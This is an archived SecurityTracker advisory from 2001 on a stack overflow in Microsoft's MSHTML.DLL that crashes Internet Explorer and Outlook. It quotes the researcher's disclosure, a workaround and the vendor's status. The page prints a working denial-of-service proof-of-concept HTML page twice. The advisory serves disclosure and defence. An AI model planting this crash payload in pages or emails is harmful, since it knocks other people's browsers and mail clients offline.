SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   OS (Microsoft)  >   Windows DLL (Any) Vendors:   Microsoft
Internet Explorer, Outlook, and Other HTML-based Applications May Crash Due to Error in MSHTML.DLL HTML Parser
SecurityTracker Alert ID:  1000585
SecurityTracker URL:  http://securitytracker.com/id/1000585
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 15 2001
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   Applications that use the Microsoft DLL MSHTML.DLL for HTML parsing, such as Internet Explorer and Outlook, may crash when multiple window objects are open and one object is receiving data.

According to the report, the bug is only experienced when dealing with multiple window objects, where one is receiving data. To reproduce the bug, you can create a JScript object, set a property on the object from the window object receiving data, delete the object and create it again. The author states that no exploitable buffer overflows have been found so far.

The author provided the following demonstration code:

------------InstantCrash.html-----------------
<iframe id=test style="display:none"></iframe>
<script>
Larholm = {}; // Object literal
test.document.open(); // Stream data
test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>");
delete Larholm;
Larholm = {}; // Crash
</script>
----------------------------------------------


Impact:   Malicious HTML code could cause the HTML application to crash.
Solution:   As a workaround, you can disable active scripting. Vendor will fix in an upcoming service pack for Internet Explorer.
Vendor URL:  www.microsoft.com/technet/security/current.asp (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Stack Overflow in MSHTML.DLL


Stack Overflow in MSHTML.DLL

Systems affected:
Any program using MSHTML.DLL for HTML parsing (Internet Explorer,
Outlook/Outlook Express and other HTML-enabled emailreaders).
Reliably tested on IE4.0 and higher on any Windows system, with any servicepacks
and patches.
Older versions of MSHTML.DLL may be affected too, but remains untested.

Risk: Low/Medium

Description:
MSHTML.DLL crashes with a Stack Overflow from simple scripting.

Details:
The bug is only experienced when dealing with multiple window objects, where one
is receiving data. To reproduce the bug, create a JScript object, set a property
on the object from the window object receiving data, delete the object and
create it again.
No exploitable buffer overflows have been found so far.

Code:

------------InstantCrash.html-----------------
<iframe id=test style="display:none"></iframe>
<script>
Larholm = {}; // Object literal
test.document.open(); // Stream data
test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>");
delete Larholm;
Larholm = {}; // Crash
</script>
----------------------------------------------

Workaround:
Disable Active Scripting.

Vendor status:
Microsoft was contacted on 4 December 2000.
Bug is considered to be a code quality bug, and will be adressed in a future SP
for IE.

--
Thor Larholm

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC